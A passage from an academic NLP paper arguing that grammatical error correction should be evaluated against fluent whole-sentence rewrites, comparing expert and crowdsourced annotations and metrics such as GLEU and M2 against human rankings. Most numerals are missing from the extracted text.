dahlmeier et al., ). the first shared task in gec aspired to the clc’s same objective: to develop tools for language learn- ers (dale and kilgarriff, ). subsequent shared tasks (dale et al., ; ng et al., ) followed suit, targeting specific error types. error-coded corpora are effective training and evaluation data for targeted error correction, and statistical classi- fiers have been developed to handle errors involving closed-class words (rozovskaya and roth, ). however, the conll shared task engendered a sea change in gec: in this shared task, systems needed to correct all errors in a sentence, of all er- ror types, including ones more stylistic in nature (ng et al., ). 
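the annotation model described at the start of this section — mark a span of text, assign an error code, and supply a correction for that span — can be made concrete with a small illustration. the tuple layout below is invented for this text and does not reproduce the clc or nucle file formats; the example sentence is the verb-form error from the introduction.

```python
# illustrative sketch of span-based, error-coded annotation as described above.
# the data layout is invented for illustration; it is not the CLC or NUCLE format.
from typing import List, Tuple

# each edit: (start_token, end_token, error_code, replacement_tokens)
Edit = Tuple[int, int, str, List[str]]

def apply_edits(tokens: List[str], edits: List[Edit]) -> List[str]:
    """apply non-overlapping span edits, right to left so earlier offsets stay valid."""
    out = list(tokens)
    for start, end, _code, repl in sorted(edits, key=lambda e: e[0], reverse=True):
        out[start:end] = repl
    return out

source = "social media has shorten our distance .".split()
edits: List[Edit] = [
    (3, 4, "Vform", ["shortened"]),   # minimal, targeted correction of a verb-form error
]
print(" ".join(apply_edits(source, edits)))
# -> social media has shortened our distance .
```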
the evaluation metrics and annotated data from the previous shared task were used; how- ever we argue that they do not align with the use case of this reframed task. what is the use case of whole-sentence correction? it should not be to pro- vide specific targeted feedback on error types, but rather to rewrite sentences as a proofreader would. the community has already begun to view whole- sentence correction as a task, with the yet unstated goal of improving the overall fluency of sentences. independent papers published human evaluations of the shared task system output (napoles et al., ; grundkiewicz et al., ), asking judges to rank systems based on their grammaticality. as gec moves toward correcting an entire sentence instead of targeted error types, the myriad acceptable edits will result in much lower iaa, compromising eval- uation metrics based on the precision and recall of coded errors. at this juncture, it is crucial that we examine whether error-coded corpora and evalua- tion are necessary for this new direction of gec. finally, it would be remiss not to address the cost and time of corpus annotation. tetreault and chodorow ( ) noted that it would take hours to correct , preposition errors by one trained annotator. bryant and ng ( ) reported that it took about three weeks ( hours) to collect independent annotations for , sentences, with all conll- error types annotated. clearly, constructing a corpus with fine-grained error an- notations is a labor-intensive process. due to the time and cost of annotation, the corpora currently used in the community are few and tend to be small, hampering robust evaluations as well as lim- iting the power of statistical models for generat- ing corrections. if an effective method could be devised to decrease time or cost, larger corpora— and more of them—could be created. there has been some work exploring this, namely tetreault and chodorow ( ), which used a sampling ap- proach that would only work for errors involving closed-class words. pavlick et al. ( ) also de- scribe preliminary work into designing an improved crowdsourcing interface to expedite data collection of coded errors. section outlines our annotation approach, which is faster and cheaper than previous approaches be- cause it does not make use of error coding. . evaluation practices three evaluation metrics have been proposed for gec: maxmatch (m ) (dahlmeier and ng, ), i-measure (felice and briscoe, ), and gleu (napoles et al., ). the first two compare the changes made in the output to error-coded spans of the reference corrections. m was the metric used not including the metrics of the hoo shared tasks, which were precision, recall, and f-score. for the and conll gec shared tasks (ng et al., ; ng et al., ). it captures word- and phrase-level edits by building an edit lattice and calculating an f-score over the lattice. felice and briscoe ( ) note problems with m : specifically, it does not distinguish between a “do-nothing baseline” and systems that only pro- pose wrong corrections; also, phrase-level edits can be easily gamed because the lattice treats the dele- tion of a long phrase as a single edit. to address these issues, they propose i-measure, which gener- ates a token-level alignment between the source sen- tence, system output, and gold-standard sentences, and then computes accuracy based on the alignment. unlike these approaches, gleu does not use error-coded references (napoles et al., ). 
based on bleu (papineni et al., ), it computes n-gram precision of the system output against refer- ence sentences. gleu additionally penalizes text in the output that was unchanged from the source but changed in the reference sentences. recent work by napoles et al. ( ) and grund- kiewicz et al. ( ) evaluated these metrics against human evaluations obtained using methods bor- rowed from the workshop on statistical machine translation (bojar et al., ). both papers found a moderate to strong correlation with human judg- ments for gleu and m , and a slightly negative cor- relation for i-measure. importantly, however, none of these metrics achieved as a high correlation with the human oracle ranking as desired in a fully reli- able metric. in section , we examine the available metrics over different types of reference sets to identify an evaluation setup nearly as reliable as human experts. creating a new, fluent gec corpus we hypothesize that human judges, when presented with two versions of a sentence, will favor fluent ver- sions over ones that exhibit only technical grammat- icality. by technical grammaticality, we mean adherence to an accepted set of grammatical conventions. in contrast, we consider a text to be fluent when it we use the term references to refer to the corrected sen- tences, since the term gold standard suggests that there is just one right correction. looks and sounds natural to a native-speaking pop- ulation. both of these terms are hard to define pre- cisely, and fluency especially is a nuanced concept for which there is no checklist of criteria to be met. to carry the intuitions, table contains examples of sentences that are one, both, or neither. a text does not have to be technically grammatical to be consid- ered fluent, although in almost all cases, fluent texts are also technically grammatical. in the rest of this paper, we will demonstrate how they are quantifiably different with respect to gec. annotating coded errors encourages a minimal set of edits because more substantial edits often address overlapping and interacting errors. for example, the annotators of the nucle corpus, which was used for the recent shared tasks, were explicitly instructed to select the minimal text span of possible alterna- tives (dahlmeier et al., ). there are situations where error-coded annotations are useful to help stu- dents correct specific grammatical errors. the abil- ity to do this with the non-error-coded, fluent an- notations we advocate here is no longer direct, but is not lost entirely. for this purpose, some recent studies have proposed post hoc automated error- type classification methods (swanson and yamangil, ; xue and hwa, ), which compare the orig- inal sentence to its correction and deduce the error types. we speculate that, by removing the error-coding restraint, we can obtain edits that sound more fluent to native speakers while also reducing the expense of annotation, with diminished time and training re- quirements. chodorow et al. ( ) and tetreault et al. ( ) suggested that it is better to have a large number of annotators to reduce bias in automatic evaluation. following this recommendation, we col- lected additional annotations without error codes, written by both experts and non-experts. it is important to note that both grammaticality and fluency are determined with respect to a particular speaker population and setting. in this paper, we focus on standard written en- glish, which is the standard used in education, business, and journalism. 
while judgments of individual sentences would differ for other populations and settings (for example, spoken african-american vernacular english), the distinction between grammaticality and fluency would remain. technically grammatical not technically grammatical fluent in addition, it is impractical to make such a law. i don’t like this book, it’s really boring. not fluent firstly , someone having any kind of disease be- longs to his or her privacy . it is unfair to release a law only point to the ge- netic disorder. table : examples and counterexamples of technically grammatical and fluent sentences. original genetic disorder may or may not be hirataged hereditary disease and it is sometimes hard to find out one has these kinds of diseases . expert fluency a genetic disorder may or may not be e a hereditary disease , and it is sometimes hard to find out whether one has these kinds of diseases . non-expert fluency genetic e factors can manifest overtly as disease e , or simply be carried , making it e hard , sometimes , to find out if one has e a genetic predisposition to disease . table : an example sentence with expert and non-expert fluency edits. moved and changed or inserted spans are underlined and e indicates deletions. . data collection we collected a large set of additional human correc- tions to the nucle . test set, which was used in the conll shared task on gec (ng et al., ) and contains , sentences error-coded by two trained annotators. bryant and ng ( ) col- lected an additional eight annotations using the same error-coding framework, referred to here as bn . we collected annotations from both experts and non-experts. the experts were three native en- glish speakers familiar with the task. to ensure that the edits were clean and meaning-preserving, each expert’s corrections were inspected by a dif- ferent expert in a second pass. for non-experts, we used crowdsourcing, which has shown potential for annotating closed-class errors as effectively as ex- perts (tetreault et al., ; madnani et al., ; tetreault et al., ). we hired participants on amazon mechanical turk (mturk) who had a hit approval rate of at least % and were located in the united states. the non-experts went through an additional screening process: before completing the task, they wrote corrections for five sample sen- tences, which were checked by the three experts. www.comp.nus.edu.sg/˜nlp/conll st.html all of the expert annotators are authors of this work. the experts verified that the participants were following the instructions and not gaming the hits. we collected four complete sets of annotations by both types of annotators: two sets of minimal edits, designed to make the original sentences technically grammatical (following the nucle annotation in- structions but without error coding), and two sets of fluency edits, designed to elicit native-sounding, flu- ent text. the instructions were: • minimal edits: make the smallest number of changes so that each sentence is grammatical. • fluency edits: make whatever changes neces- sary for sentences to appear as if they had been written by a native speaker. in total, we collected ( × × ) annotations from each original sentence (minimal and fluency, expert and non-expert, two corrections each). of the original , sentences, the experts flagged sentences that needed to be merged together, so we skipped these sentences in our analysis and experi- ments. 
in the next two subsections we compare the changes made under both the fluency and minimal edit conditions (section . ) and show how humans rate corrections made by experts and non experts in both settings (section . ). . edit analysis when people (both experts and non-experts) are asked to make minimal edits, they make few changes www.comp.nus.edu.sg/~nlp/conll st.html original some family may feel hurt , with regards to their family pride or reputation , on having the knowl- edge of such genetic disorder running in their family . nucle some family members may feel hurt e with regards to their family pride or reputation e on having the knowledge of a genetic disorder running in their family . expert fluency on e learning of such a genetic disorder running in their family , some family members may feel hurt e regarding their family pride or reputation . non-expert fluency some relatives may e be concerned about the family ’s e reputation – not to mention their own pride – in relation to this news of e familial genetic defectiveness e . expert minimal some families may feel hurt e with regards to their family pride or reputation , on having e knowledge of such a genetic disorder running in their family . non-expert minimal some family may feel hurt e with regards to their family pride or reputation e on having the knowledge of such genetic disorder running in their family . table : an example sentence with the original nucle correction and fluency and minimal edits written by experts and non-experts. moved and changed or inserted spans are underlined and e indicates deletions. to the sentences and also change fewer of the sen- tences. fluency edits show the opposite effect, with non-experts taking more liberties than experts with both the number of sentences changed and the de- gree of change within each sentence (see table for an extreme example of this phenomenon). in order to quantify the extent of changes made in the different annotations, we look at the percent of sentences that were left unchanged as well as the number of changes needed to transform the original sentence into the corrected annotation. to calculate the number of changes, we used a modified trans- lation edit rate (ter), which measures the number of edits needed to transform one sentence into an- other (snover et al., ). an edit can be an inser- tion, deletion, substitution, or shift. we chose this metric because it counts the movement of a phrase (a shift) as one change, which the levenshtein dis- tance would heavily penalize. ter is calculated as the number of changes per token, but instead we re- port the number of changes per sentence for ease of interpretation, which we call the ster. we compare the original set of sentences to the new annotations and the existing nucle and bn reference sets to determine the relative extent of changes made by the fluency and minimal edits (fig- ure ). compared to the original, non-experts had a higher average ster than experts, meaning that they made more changes per sentence. for fluency ed- its, experts and non-experts changed approximately the same number of sentences, but the non-experts made about seven edits per sentence compared to the experts’ four. minimal edits by both experts and non-experts exhibit a similar degree of change from the original sentences, so further qualitative assess- ment is necessary to understand whether the annota- tors differ. 
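a minimal sketch of the per-sentence edit count used above (ster) follows. it substitutes a plain levenshtein operation count for full ter, so it counts insertions, deletions, and substitutions but, unlike ter, does not treat a phrase shift as a single edit; the sentences are invented, and the same routine can be applied between two annotators' corrections as in the agreement analysis below.

```python
# sketch of a per-sentence edit count in the spirit of sTER.
# caveat: true TER counts a phrase shift as one edit; this simplification
# only counts token insertions, deletions, and substitutions.
def edit_ops(a, b):
    """number of token insertions/deletions/substitutions needed to turn a into b."""
    m, n = len(a), len(b)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        dp[i][0] = i
    for j in range(n + 1):
        dp[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,         # deletion
                           dp[i][j - 1] + 1,         # insertion
                           dp[i - 1][j - 1] + cost)  # substitution / match
    return dp[m][n]

def mean_changes_per_sentence(originals, corrections):
    """average number of edits per sentence (changes per sentence, not per token)."""
    pairs = list(zip(originals, corrections))
    return sum(edit_ops(o.split(), c.split()) for o, c in pairs) / len(pairs)

orig = ["social media has shorten our distance ."]
corr = ["social media has shortened the distance between us ."]
print(mean_changes_per_sentence(orig, corr))
```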
table contains an example of how the same ungrammatical sentence was corrected using both minimal and fluency edits, as well as one of the original nucle corrections. the error-coded annotations of nucle and bn fall somewhere in between the fluency and minimal edits in terms of ster. the most conservative set of sentences is the system output of the conll shared task, with ster = . , or approximately one change made per sentence. in contrast, the most conservative human annotations, the minimal edits, edited a similar percent of the sentences but made about two changes per sentence.

when there are multiple annotators working on the same data, one natural question is the inter-annotator agreement (iaa). for gec, iaa is often low and arguably not an appropriate measure of agreement (bryant and ng, ). additionally, it would be difficult, if possible at all, to reliably calculate iaa without coded alignments between the new and original sentences.

[figure : amount of changes made by different annotation sets compared to the original sentences — the percent of sentences changed and the mean ster (insertions, deletions, substitutions, phrases shifted) for nucle, bn , e-minimal, n-minimal, e-fluency, n-fluency, and the system output.]

therefore, we look at two alternate measures: the percent of sentences to which different annotators made the same correction(s) and the ster between two annotators' corrections, reported in table . as we expect, there is notably lower agreement between the annotators for fluency edits than for minimal edits, due to the presumably smaller set of required versus optional stylistic changes. expert annotators produced the same correction on % of the fluency edits, but more than % of their minimal edits were identical. half of these identical sentences were unchanged from the original. there was lower agreement between non-expert annotators than experts on both types of edits. we performed the same calculations between the two nucle annotators and found that they had agreement rates similar to the non-expert minimal edits. however, the experts' minimal edits have much higher consensus than both the non-experts' and nucle, with twice as many identical corrected sentences and half the ster. from this analysis, one could infer that the expert annotations are more reliable than the non-expert because there are fewer differences between annotators and fewer changes per sentence.

[table : a comparison of annotations across different annotators (e for expert, n for non-expert) — percent of identical corrections and mean ster for the fluency (e v. e, n v. n, e v. n), minimal (e v. e, n v. n, e v. n), and nucle (a v. b) pairings. where there were more than two annotators, statistics are over the full pairwise set. identical refers to the percentage of sentences where both annotators made the same correction and ster is the mean ster between the annotators' corrections.]

. human evaluation
as an additional validation, we ran a task to establish the relative quality of the new fluency and minimal-edit annotations using crowdsourcing via mturk. participants needed to be in the united states with a hit approval rate of at least % and pass a preliminary ranking task, graded by the authors.
we randomly selected sentences and asked participants to rank the new annotations, one randomly selected nucle correction, and the original sentence in order of grammaticality and meaning preservation (that is, a sentence that is well-formed but changes the meaning of the original source should have a lower rank than one that is equally well-formed but maintains the original meaning). since we were comparing the minimal edits to the fluency edits, we did not define the term grammaticality, but instead relied on the participants' understanding of the term. each sentence was ranked by two different judges, for a total of rankings, yielding , pairwise comparisons.

to rank systems, we use the trueskill approach (herbrich et al., ; sakaguchi et al., ), based on a protocol established by the workshop on machine translation (bojar et al., ; bojar et al., ). for each competing system, trueskill infers the absolute system quality from the pairwise comparisons, representing each as the mean of a gaussian. these means can then be sorted to rank systems. by running trueskill , times using bootstrap resampling and producing a system ranking each time, we collect a range of ranks for each system. we can then cluster systems according to non-overlapping rank ranges (koehn, ) to produce the final ranking, allowing ties.

[table : human ranking of the new annotations by grammaticality — score and rank range for expert fluency, non-expert fluency, nucle, expert minimal, non-expert minimal, and the original sentence, in that order from best to worst. lines between systems indicate clusters according to bootstrap resampling at p ≤ . ; systems in the same cluster are considered to be tied.]

table shows the ranking of "grammatical" judgments for the additional annotations and the original nucle annotations. while the score of the expert fluency edits is higher than the non-expert fluency, they are within the same cluster, suggesting that the judges perceived them to be just as good. the fluency rewrites by both experts and non-experts are clearly preferable over the minimal edit corrections, although the error-coded nucle corrections are perceived as more grammatical than the minimal corrections.

automatic metrics
we have demonstrated that humans prefer fluency edits to error-coded and minimal-edit corrections, but it is unclear whether these annotations are an effective reference for automatic evaluation. the broad range of changes that can be made with non-minimal edits may make it especially challenging for current automatic evaluation metrics to use. in this section, we investigate the impact that different reference sets have on the system ranking found by different evaluation metrics. with reference sets having such different characteristics, the natural question is: which reference and evaluation metric pairing best reflects human judgments of grammaticality? to answer this question, we performed a comprehensive investigation of existing metrics and annotation sets to evaluate the system outputs made public from the conll shared task. to our knowledge, this is the first time that the interplay of annotation scheme and evaluation metric, as well as the rater expertise, has been evaluated jointly for gec.

. experimental setup
the four automatic metrics that we investigate are m , i-measure, gleu, and bleu.
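before turning to the metrics themselves, the ranking procedure described above — inferring absolute system quality from pairwise human judgments with trueskill, then bootstrap-resampling to form clusters of tied systems — is the human ranking against which the metrics below are compared. a minimal sketch of that procedure follows; it assumes the third-party trueskill python package, uses invented judgments and system names, and ignores tied judgments, so it illustrates the approach rather than reproducing the wmt tooling used in the paper.

```python
# sketch of ranking systems from pairwise human judgments with trueskill and
# bootstrap resampling, as described in the human-evaluation protocol above.
# assumes the third-party `trueskill` package; judgments here are invented.
import random
from collections import defaultdict
import trueskill

def rank_once(judgments, systems):
    """judgments: list of (winner, loser) pairs -> {system: mean skill (mu)}."""
    env = trueskill.TrueSkill(draw_probability=0.0)
    ratings = {s: env.create_rating() for s in systems}
    for winner, loser in judgments:
        ratings[winner], ratings[loser] = env.rate_1vs1(ratings[winner], ratings[loser])
    return {s: r.mu for s, r in ratings.items()}

def bootstrap_rank_ranges(judgments, systems, n_boot=100):
    """resample judgments with replacement and record each system's range of ranks;
    systems whose ranges overlap can be treated as tied (one cluster)."""
    ranges = defaultdict(lambda: [len(systems), 1])
    for _ in range(n_boot):
        sample = [random.choice(judgments) for _ in judgments]
        mus = rank_once(sample, systems)
        order = sorted(systems, key=mus.get, reverse=True)
        for rank, s in enumerate(order, start=1):
            lo, hi = ranges[s]
            ranges[s] = [min(lo, rank), max(hi, rank)]
    return dict(ranges)

systems = ["sysA", "sysB", "sysC"]
judgments = [("sysA", "sysB"), ("sysA", "sysC"), ("sysB", "sysC"), ("sysA", "sysB")]
print(bootstrap_rank_ranges(judgments, systems, n_boot=20))
```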
we include the machine-translation metric bleu because evaluating against our new non-coded annotations is similar to machine-translation evaluation, which considers overlap instead of absolute alignment between the output and reference sentences. for the m and i-measure evaluations, we aligned the fluency and minimal edits to the original sentences using a levenshtein edit distance algorithm. neither metric makes use of the annotation labels, so we simply assigned dummy error codes. our gleu implementation differs from that of napoles et al. ( ). we use a simpler, modified version: precision is the number of candidate (c) n-grams that match the reference (r) n-grams, minus the counts of n-grams found more often in the source (s) than the reference (equation ). because the number of possible reference n-grams increases as more reference sets are used, we calculate an intermediate gleu by drawing a random sample from one of the references and report the mean score over iterations. we compare the system outputs to each of the six annotation sets and a seventh set containing all of the annotations, using each metric. we ranked the systems based on their scores using each metric–annotation-set pair, and thus generated a total of different rankings ( metrics × annotation sets). to determine the best metric, we compared the system-level ranking obtained from each evaluation technique against the expert human ranking reported in grundkiewicz et al. ( ), table c. we ran i-measure with the -nomix flag, preventing the algorithm from finding the optimal alignment across all possible edits; alignment was very memory-intensive and time consuming, even when skipping long sentences. costs for insertion, deletion, and substitution are set to , allowing partial match (e.g. same lemma). running all iterations, it takes less than seconds to evaluate , sentences.

\[
p^{*}_{n} = \frac{\displaystyle\sum_{\mathrm{ngram} \in \{C \cap R\}} \mathrm{count}_{C,R}(\mathrm{ngram}) \;-\; \sum_{\mathrm{ngram} \in \{C \cap S\}} \max\big[0,\; \mathrm{count}_{C,S}(\mathrm{ngram}) - \mathrm{count}_{C,R}(\mathrm{ngram})\big]}{\displaystyle\sum_{\mathrm{ngram} \in \{C\}} \mathrm{count}(\mathrm{ngram})}
\]
\[
\mathrm{count}_{A,B}(\mathrm{ngram}) = \min\big(\#\ \text{occurrences of ngram in } A,\; \#\ \text{occurrences of ngram in } B\big)
\]

[figure : correlation of the human ranking with metric scores over different reference sets (spearman's ρ) — m , gleu, i-measure, and bleu against the nucle, bn , e-fluency, n-fluency, e-minimal, n-minimal, and all reference sets; the number of annotations per sentence in each set is in parentheses. see table for the numeric values.]

[table : correlation between the human ranking and metric scores over different reference sets — rows for nucle, bn , e-fluency, n-fluency, e-minimal, n-minimal, and all; columns for m , gleu, i-measure, and bleu. the first line of each cell is spearman's ρ and the second line is pearson's r; the strongest correlations for each metric are starred, and the overall strongest correlations are in bold.]

. results
figure and table show the correlation of the expert rankings with all of the evaluation configurations. for the leading metrics, m and gleu, the expert annotations had stronger positive correlations than the non-expert annotations. using just two expert fluency annotations with gleu has the strongest correlation with the human ranking out of all other metric–reference pairings (ρ = . , r = . ), and it is additionally cheaper and faster to collect.
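before continuing with the results, the modified n-gram precision in the equation above can be sketched compactly. the code below is an illustration written for this text, not the authors' released reassess-gec implementation: the sentences are invented, and a full gleu score would additionally combine several n-gram orders and a brevity penalty, which are omitted here; only the source-penalized precision and the reference-sampling loop for the intermediate score are shown.

```python
# illustrative implementation of the modified n-gram precision p*_n defined above:
# candidate/reference matches, minus n-grams over-represented relative to the
# source, clipped at zero. sketch only; not the authors' released code.
import random
from collections import Counter

def ngrams(tokens, n):
    return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

def modified_precision(candidate, source, reference, n=2):
    c, s, r = ngrams(candidate, n), ngrams(source, n), ngrams(reference, n)
    count_cr = {g: min(c[g], r[g]) for g in c if g in r}   # count_{C,R}
    count_cs = {g: min(c[g], s[g]) for g in c if g in s}   # count_{C,S}
    penalty = sum(max(0, count_cs[g] - count_cr.get(g, 0)) for g in count_cs)
    total = sum(c.values())
    return (sum(count_cr.values()) - penalty) / total if total else 0.0

def mean_sampled_precision(candidate, source, references, n=2, iters=100, seed=0):
    """intermediate score: sample one reference per iteration and average."""
    rng = random.Random(seed)
    return sum(modified_precision(candidate, source, rng.choice(references), n)
               for _ in range(iters)) / iters

src = "social media has shorten our distance .".split()
out = "social media has shortened our distance .".split()
refs = ["social media has shortened the distance between us .".split(),
        "social media has shortened our distance .".split()]
print(mean_sampled_precision(out, src, refs))
```

the penalty term is what separates this from plain n-gram precision: an output that leaves an erroneous source n-gram untouched loses credit whenever the sampled reference changed it.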
e-fluency is the third-best reference set with m , which does better with minimal changes: the reference sets with the strongest correlations for m are e-minimal (ρ = . ) and nucle (r = . ). even though the non-expert fluency edits had more changes than the expert fluency edits, they still did reasonably well using both m and gleu. the gleu metric has the strongest correlation when comparing against the e-fluency, bn , e-minimal, and "all" reference sets. one could argue that, except for e-minimal, these references all have greater diversity of edits than nucle and minimal edits. although bn has fewer changes made per sentence than the fluency edits, because of the number of annotators, the total pool of n-grams seen per sentence increases. e-minimal edits also have strong correlation, suggesting there may be a trade-off between quantity and quality of references.

a larger number of references could improve performance for gleu. because fluency edits tend to have more variations than error-coded minimal-edit annotations, it is not obvious how many fluency edits are necessary to cover the full range of possible corrections. to address this question, we ran an additional small-scale experiment, where we collected non-expert fluency edits for sentences and computed the average gleu scores of the submitted systems against an increasing number of these fluency references. the result (figure ) shows that the gleu score increases with more fluency references, but the effect starts to level off when there are at least references, suggesting that references cover the majority of possible changes. a similar pattern was observed by bryant and ng ( ) in error-coded annotations with the m metric.

the reference sets against which m has the strongest correlation are nucle, expert fluency, and expert minimal edits. even non-expert fluency annotations result in a stronger correlation with the human metric than bn . these findings support the use of fluency edits even with a metric designed for error-coded corpora. one notable difference between m and gleu is their relative performance using non-expert minimal edits as a reference set. m is robust to the non-expert minimal edits and, as a reference set, this achieves the second strongest spearman's correlation for this metric. however, pairing the non-expert minimal edits with gleu results in slightly negative correlation. this is an unexpected result, as there is sizable overlap between the non-expert and expert minimal edits (table ). we speculate that this difference may be due to the quality of the non-expert minimal edits. recall that humans perceived these sentences to be worse than the other annotations, and better only than the original sentence (table ).

i-measure and bleu are shown to be unfavorable for this task, having negative correlation with the human ranking, which supports the findings of napoles et al. ( ) and grundkiewicz et al. ( ). even though bleu and gleu are both based on the n-gram overlap between the hypothesis and original sentences, gleu has strong positive correlations with human rankings while bleu has a moderate negative correlation. the advantage of gleu is that it penalizes n-grams in the system output that were present in the input sentence and absent from the reference. in other words, a system loses credit for missing n-grams that should have been changed.
bleu has no such penalty and instead only rewards n-grams that occur in the references and the output, which is a problem in same-language text rewriting tasks where there is significant overlap between the reference and the original sentences. for this data, bleu assigns a higher score to the original sentences than to any of the systems.

[figure : system rankings produced by gleu with expert fluency (e-fluency) as the reference, compared to the expert human ranking.]

[figure : mean gleu scores with different numbers of fluency references. the red line corresponds to the average gleu score of the gec systems and the vertical bars show the maximum and minimum gleu scores.]

figure shows the system ranking for the most strongly correlated annotation–evaluation combination (gleu with e-fluency) compared to the "ground truth" human rankings. the automatic metric clusters the systems into the correct upper and lower halves, and the input is correctly placed in the lower half of the rankings. of course, it could be that the input sentences are the best, but the human ranking in figure suggests otherwise. even though automatic metrics strongly correlate with human judgments, they still do not have the same reliability as manual evaluation. like error-coded annotations, judgment by specialists is expensive, so we investigate a more practical alternative in the following section.

human evaluation

automatic metrics are only a proxy for human judgments, which are crucial to truthfully ascertain the quality of systems. even the best result in section . , which is state of the art and has very strong rank correlation (ρ = . ) with the expert ranking, makes dramatic errors in the system ranking. given the inherent imperfection of automatic evaluation (and possible over-optimization to the nucle data set), we recommend that human evaluation be produced alongside metric scores whenever possible. however, human judgments can be expensive to obtain. crowdsourcing may address this problem and has been shown to yield reasonably good judgments for several error types at a relatively low cost (tetreault et al., ). therefore, we apply crowdsourcing to sentence-level grammaticality judgments, by replicating previous experiments that reported expert rankings of system output (napoles et al., ; grundkiewicz et al., ) using non-experts on mturk.

. experimental setup

using the same data set as those experiments and the work described in this paper, we asked screened participants on mturk to rank five randomly selected systems and nucle corrections from best to worst, with ties allowed (participants in the united states with a hit approval rate ≥ % had to pass a sample ranking task graded by the authors). sentences were randomly selected for evaluation from the nucle subsection used in grundkiewicz et al. ( ), and the output for each sentence was ranked by two different participants. the system rankings yield , pairwise judgments, from which we inferred the absolute system ranking using trueskill.

. results

figure compares the system ranking by non-experts to the same expert ranking used in section . .

[figure : output of system rankings by experts and non-experts, from best to worst. dotted lines indicate clusters according to bootstrap resampling (p ≤ . ).]
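as an illustration of the ranking procedure described in the experimental setup above, here is a hedged python sketch that turns ranked judgments into pairwise comparisons and aggregates them with the third-party `trueskill` package; the judgment data, system names, and draw probability are invented for illustration, and this is not the authors' released code.

```python
import itertools
import trueskill  # third-party package implementing the trueskill rating system

# each crowdsourced hit ranks a handful of systems from best to worst (ties allowed);
# here we assume each judgment is a tuple of system names in ranked order.
judgments = [
    ("amu", "camb", "rac"),   # amu judged best, rac worst
    ("camb", "amu", "input"),
    ("rac", "input", "camb"),
]

env = trueskill.TrueSkill(draw_probability=0.1)
ratings = {}

def rating(name):
    return ratings.setdefault(name, env.create_rating())

# convert each ranked list into pairwise comparisons and update the ratings
for ranking in judgments:
    for better, worse in itertools.combinations(ranking, 2):
        ratings[better], ratings[worse] = env.rate_1vs1(rating(better), rating(worse))

# order systems by a conservative skill estimate (mu - 3*sigma)
for name, r in sorted(ratings.items(), key=lambda kv: kv[1].mu - 3 * kv[1].sigma, reverse=True):
    print(f"{name}: mu={r.mu:.2f} sigma={r.sigma:.2f}")
```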
[table : inter-annotator agreement of pairwise system judgments within non-experts, within experts, and between the two groups, reported as cohen's κ and quadratic-weighted κ.]

the rankings have very strong correlation (ρ = . , r = . ), indicating that non-expert grammaticality judgments are comparably as reliable as those by experts. compared to the best metric ranking shown in figure , the non-expert ranking appears significantly better. no system has a rank more than two away from the expert rank, while gleu has six systems with ranks that are three away. the non-expert correlation can be seen as an upper bound for the task, which is approached but not yet attained by automatic metrics. systems in the same cluster, indicated by dotted lines in figure , can be viewed as ties. from this perspective the expert and non-expert rankings are virtually identical. in addition, experts and non-experts have similar inter-annotator agreement in their pairwise system judgments (table ); in addition to cohen's κ, we report weighted κ because a > b and a < b should have less agreement than a > b and a = b. the agreement between experts and non-experts is lower than the agreement between just experts or just non-experts, which may be due to the difference between the experimental settings for experts (grundkiewicz et al., ) and for non-experts (this work). however, this finding is not overly concerning since the correlation between the rankings is so strong. in all, judgments cost approximately $ ($ . per sentence) and took a total of hours to complete. because the non-expert ranking very strongly correlates to the expert ranking and non-experts have similar iaa as experts, we conclude that expensive expert judgments can be replaced by non-experts, when those annotators have been appropriately screened.

conclusion

there is a real distinction between technical grammaticality and fluency. fluency is a level of mastery that goes beyond knowledge of how to follow the rules, and includes knowing when they can be broken or flouted. language learners, who are a prime constituency motivating the gec task, ultimately care about the latter. but crucially, the current approach of collecting error-coded annotations places downward pressure on annotators to minimize edits in order to neatly label them. this results in annotations that are less fluent, and therefore less useful, than they should be. we have demonstrated this with the collection of both minimally-edited and fluent rewrites of a common test set (section . ); the preference for fluent rewrites over minimal edits is clear (table ). to correct this, the annotations and associated metrics used to score automated gec systems should be brought more in line with this broadened goal. we advocate for the collection of fluent sentence-level rewrites of ungrammatical sentences, which is cheaper than error-coded annotations and provides annotators with the freedom to produce fluent edits. in the realm of automatic metrics, we found that a modified form of gleu computed against expert fluency rewrites correlates best with a human ranking of the systems; a close runner-up collects the rewrites from non-experts instead of experts. finally, to stimulate metric development, we found that we were able to produce a new human ranking of systems using non-expert judges.
these judges produced a ranking that was highly correlated with the expert ranking produced in earlier work (grundkiewicz et al., ). the implication is further reduced costs in producing a gold-standard ranking for new sets of system outputs against both existing and new corpora. as a result, we make the following recommendations:

• gec should be evaluated against – whole-sentence rewrites, which can be obtained by non-experts.
• automatic metrics that rely on error coding are not necessary, depending on the use case. of the automatic metrics that have been proposed, we found that a modified form of gleu (napoles et al., ) is the best-correlated.
• the field of gec is in danger from over-reliance on a single annotated corpus (nucle). new corpora should be produced in a regular fashion, similar to the workshop on statistical machine translation.

fortunately, collecting annotations in the form of unannotated sentence-level rewrites is much cheaper than error-coding, facilitating these practices. by framing grammatical error correction as fluency, we can reduce the cost of annotation while creating a more reliable gold standard. we have clearly laid out improved practices for annotation and evaluation, demonstrating that better quality results can be achieved for less cost using fluency edits instead of error coding. all of the source code and data, including templates for data collection, will be publicly available, which we believe is crucial for supporting the improvement of gec in the long term.

acknowledgments

we would like to thank christopher bryant, mariano felice, roman grundkiewicz and marcin junczys-dowmunt for providing data and code. we would also like to thank the tacl editor, chris quirk, and the three anonymous reviewers for their comments and feedback. this material is based upon work partially supported by the national science foundation graduate research fellowship under grant no. .

references

ondrej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint-amand, radu soricut, lucia specia, and aleš tamchyna. . findings of the workshop on statistical machine translation. in proceedings of the ninth workshop on statistical machine translation, pages – , baltimore, maryland, usa, june. association for computational linguistics.

ondřej bojar, rajen chatterjee, christian federmann, barry haddow, matthias huck, chris hokamp, philipp koehn, varvara logacheva, christof monz, matteo negri, matt post, carolina scarton, lucia specia, and marco turchi. . findings of the workshop on statistical machine translation. in proceedings of the tenth workshop on statistical machine translation, pages – , lisbon, portugal, september. association for computational linguistics.

christopher bryant and hwee tou ng. . how far are we from fully automatic high quality grammatical error correction? in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics.

martin chodorow and claudia leacock. . an unsupervised method for detecting grammatical errors. in proceedings of the conference of the north american chapter of the association of computational linguistics (naacl), pages – .

